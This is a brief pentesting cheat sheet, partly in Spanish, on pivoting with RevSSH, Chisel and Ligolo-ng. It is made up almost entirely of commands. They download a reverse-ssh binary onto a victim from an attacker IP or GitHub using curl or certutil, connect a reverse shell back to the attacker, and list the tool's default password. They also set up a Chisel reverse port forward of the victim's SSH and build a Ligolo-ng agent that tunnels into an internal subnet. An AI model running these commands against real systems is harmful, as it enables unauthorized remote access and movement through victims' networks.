Pivoting
RevSSH
Attack machine:
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
/dev/shm/reverse-ssh -v -l :4444
Victim Machine:
Linux
# Drop it via your preferred way, e.g.
curl http://10.10.14.9:8000/upx_reverse-sshx86 -o /dev/shm/upx_reverse-sshx86
/dev/shm/reverse-ssh -p 3333 USERATACANTE@IPATACANTE
Windows
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
reverse-ssh.exe -p 3333 USERATACANTE@IPATACANTE
En tu máquina
ssh -p 8888 127.0.0.1
letmeinbrudipls
Chisel
Atacante
chisel server --port 8000 --reverse
Víctima
Redirigirá el 22 de la víctima al 8888 del atacante:
chisel client <IP_SERVIDOR>:8000 R:8888:127.0.0.1:22
Ligolo-ng
Compilar dinámicamente:
go build -o agent /cmd/agent/main.go
Compilar estáticamente:
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o agent -ldflags "-s -w" cmd/agent/main.go
sudo ip tuntap add user <Your Username> mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert
En la víctima
./agent -connect <Attack IP>:11601 -ignore-cert
Para listar las sesiones : session y elegimos una.
Podemos ejecutar ifconfig para ver las interfaces que tiene y en base a eso configuramos la interfaz en nuestra kali
Dentro de la sesión ejecutamos start
sudo ip route add 172.16.20.0/24 dev ligolo
Cuando se buguee la interfaz
sudo ip link delete ligolo
sudo ip tuntap add dev ligolo mode tun
sudo ip link set ligolo up